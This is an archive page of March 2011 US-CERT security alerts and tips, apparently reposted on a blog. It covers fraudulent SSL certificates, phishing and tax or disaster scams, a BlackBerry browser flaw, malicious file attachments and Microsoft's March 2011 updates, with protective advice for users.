Archive for March, 2011

US-CERT is aware of public reports of the existence of fraudulent SSL certificates. These fraudulent SSL certificates could be used by an attacker to masquerade as a trusted website. Multiple web browser vendors have provided updates to recognize and block these fraudulent SSL certificates.

Mozilla has updated Firefox 4.0, 3.6, and 3.5. Additional information can be found in the Mozilla Security Blog.

Microsoft has released updates for various platforms in Microsoft Knowledge Base Article 2524375. Additional information can be found in Microsoft Security Advisory 2524375.

US-CERT encourages users and administrators to apply any necessary updates to help mitigate the risks. US-CERT will provide additional information as it becomes available.

Relevant Url(s):
<http://blog.mozilla.com/security/2011/03/22/firefox-blocking-fraudulent-certificates/>

<http://www.microsoft.com/technet/security/advisory/2524375.mspx>

<http://support.microsoft.com/kb/2524375>

US-CERT is aware of public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment.

This attack is unlike common phishing attacks because it locally stores the malicious webpage rather than directing user to a phishing site via a URL. Many browsers utilize anti-phishing filters to help protect users against phishing attacks, this method of attack is able to bypass this security mechanism.

US-CERT encourages users and administrators to take the following measures to protect themselves from these types of phishing attacks:
* Do not follow unsolicited web links or attachments in email
messages.
* Use caution when providing personal information online.
* Verify the legitimacy of the email by contacting the organization
directly through a trusted contact method.
* Refer to the Recognizing and Avoiding Email Scams (pdf) document
for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks
document for more information on social engineering attacks.
* Refer to the Using Caution with Email Attachments Cyber Security
Tip for more information on safely handling email attachments.

In the past, US-CERT has received reports of an increased number of phishing scams and malware campaigns that take advantage of the United States tax season. Due to the upcoming tax deadline, US-CERT reminds users to remain cautious when receiving unsolicited email that could be part of a potential phishing scam or malware campaign.

These phishing scams and malware campaigns may include, but are not limited to, the following:
* information that refers to a tax refund
* warnings about unreported or under-reported income
* offers to assist in filing for a refund
* details about fake e-file websites

These messages which may appear to be from the IRS, may ask users to submit personal information via email or may instruct the user to follow a link to a website that requests personal information or contains malicious code.

US-CERT encourages users and administrators to take the following measures to protect themselves from these types of phishing scams and malware campaigns:
* Do not follow unsolicited web links in email messages.
* Maintain up-to-date antivirus software.
* Refer to the IRS website related to phishing, email, and bogus
website scams for scam samples and reporting information.
* Refer to the Recognizing and Avoiding Email Scams (pdf) document
for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks
document for more information on social engineering attacks.
* Review the Wall Street Journal blog post “Cybercrooks Digging for
Tax Data” for additional suggestions for protecting against these
types of attacks.

Relevant Url(s):
<http://blogs.wsj.com/digits/2011/03/11/cybercrooks-digging-for-tax-data/>

Research In Motion has released a security notice to alert users of a vulnerability affecting the WebKit browser engine provided in BlackBerry Device Software versions 6.0 and later. By convincing a user to browse to specially crafted website, a remote attacker may be able to execute arbitrary code. Exploitation of this vulnerability may allow an attacker to access user data stored on the media card and the built-in media storage on the affected BlackBerry device.

US-CERT encourages users and administrators to review BlackBerry security notice KB26132 and do the following to help mitigate the
risks:
* Exercise caution when accessing untrusted websites in browsers,
email messages, or instant messages.
* Disable the use of JavaScript in the BlackBerry Browser or Disable
the BlackBerry Browser as suggested in BlackBerry security notice
KB26132.

Additional information regarding this vulnerability can be found in US Department of Energy Cyber Incident Response Capability (DOE-CIRC) technical bulletin T-579. US-CERT will provide additional information as it becomes available.

Relevant Url(s):
<http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB26132#environmentSection>

<http://www.doecirc.energy.gov/bulletins/t-579.shtml>

US-CERT would like to warn users of potential email scams, fake antivirus and phishing attacks regarding the Japan earthquake and the tsunami disasters. Email scams may contain links or attachments which may direct users to phishing or malware-laden websites. Fake antivirus attacks may come in the form of pop-ups which flash security warnings and ask the user for credit card information. Phishing emails and websites requesting donations for bogus for charitable organizations commonly appear after these types of natural disasters.

US-CERT encourages users to take the following measures to protect
themselves:

Do not follow unsolicited web links or attachments in email messages.
Maintain up-to-date antivirus software.
Review the Recognizing Fake Antivirus document for additional information on recognizing fake antivirus.
Refer to the Avoiding Social Engineering and Phishing Attacks document for additional information on social engineering attacks.
Refer to the Recognizing and Avoiding Email Scams (pdf) document for additional information on avoiding email scams.
Review the Federal Trade Commission’s Charity Checklist.
Verify the legitimacy of the email by contacting the organization directly through a trusted contact number. Trusted contact information can be found on the Better Business Bureau National Charity Report Index.

US-CERT will provide additional information as it becomes available.

Relevant Url(s):
<http://www.us-cert.gov/cas/tips/ST04-014.html>

<https://www.us-cert.gov/cas/tips/ST10-001.html>

<http://www.ftc.gov/bcp/edu/pubs/consumer/telemarketing/tel01.shtm>

<http://www.us-cert.gov/reading_room/emailscams_0905.pdf>

<http://www.bbb.org/charity-reviews/national/>

Malicious code is not always hidden in web page scripts or unusual file
formats. Attackers may corrupt types of files that you would recognize and
typically consider safe, so you should take precautions when opening files
from other people.

What types of files can attackers corrupt?

An attacker may be able to insert malicious code into any file, including
common file types that you would normally consider safe. These files may
include documents created with word processing software, spreadsheets, or
image  files. After corrupting the file, an attacker may distribute it
through email or post it to a web site. Depending on the type of malicious
code, you may infect your computer by just opening the file.

When corrupting files, attackers often take advantage of vulnerabilities
that they discover in the software that is used to create or open the file.
These vulnerabilities may allow attackers to insert and execute malicious
scripts  or  code,  and  they  are  not always detected. Sometimes the
vulnerability involves a combination of certain files (such as a particular
piece of software running on a particular operating system) or only affects
certain versions of a software program.

What problems can malicious files cause?

There are various types of malicious code, including viruses, worms, and
Trojan horses (see Why is Cyber Security a Problem? for more information).
However, the range of consequences varies even within these categories. The
malicious code may be designed to perform one or more functions, including
* interfering with your computer’s ability to process information by
consuming  memory  or  bandwidth  (causing your computer to become
significantly slower or even “freeze”)
* installing, altering, or deleting files on your computer
* giving the attacker access to your computer
* using  your  computer to attack other computers (see Understanding
Denial-of-Service Attacks for more information)

How can you protect yourself?

* Use and maintain anti-virus software – Anti-virus software can often
recognize and protect your computer against most known viruses, so you
may be able to detect and remove the virus before it can do any damage
(see Understanding Anti-Virus Software for more information). Because
attackers are continually writing new viruses, it is important to keep
your definitions up to date.
* Use caution with email attachments – Do not open email attachments that
you were not expecting, especially if they are from people you do not
know. If you decide to open an email attachment, scan it for viruses
first (see Using Caution with Email Attachments for more information).
Not only is it possible for attackers to “spoof” the source of an email
message,  but your legitimate contacts may unknowingly send you an
infected  file.  If  your  email  program  automatically downloads
attachments, check your settings to see if you can disable this feature.
* Be wary of downloadable files on web sites – Avoid downloading files
from sites that you do not trust. If you are getting the files from a
supposedly  secure  site,  look  for  a  web site certificate (see
Understanding Web Site Certificates for more information). If you do
download a file from a web site, consider saving it to your computer and
manually scanning it for viruses before opening it.
* Keep software up to date – Install software patches so that attackers
cannot  take  advantage  of known problems or vulnerabilities (see
Understanding Patches for more information). Many operating systems
offer automatic updates. If this option is available, you should enable
it.
* Take advantage of security settings – Check the security settings of
your  email  client  and your web browser (see Evaluating Your Web
Browser’s Security Settings for more information). Apply the highest
level of security available that still gives you the functionality you
need.

Related information

* Securing Your Web Browser
* Recovering from Viruses, Worms, and Trojan Horses
_________________________________________________________________

Author: Mindi McDowell

Original release date: March 08, 2011
Last revised: –
Source: US-CERT

Systems Affected

* Microsoft Windows
* Microsoft Office

Overview

There are multiple vulnerabilities in Microsoft Windows and
Microsoft Office. Microsoft has released updates to address these
vulnerabilities.

Solution

Install updates

The updates to address these vulnerabilities are available on the
Microsoft Update site (requires Internet Explorer). We recommend
enabling Automatic Updates.

Description

The Microsoft Security Bulletin Summary for March 2011 describes
multiple vulnerabilities in Microsoft Windows and Microsoft Office.
Microsoft has released updates to address the vulnerabilities.

References

* Microsoft Security Bulletin Summary for March 2011 -
<https://www.microsoft.com/technet/security/bulletin/ms11-mar.mspx>

* Microsoft Update – <https://www.update.microsoft.com/>

* Microsoft Update Overview -
<http://www.microsoft.com/security/updates/mu.aspx>

* Managing Automatic Updates -
<http://windows.microsoft.com/en-us/windows-vista/Turn-automatic-updating-on-or-off>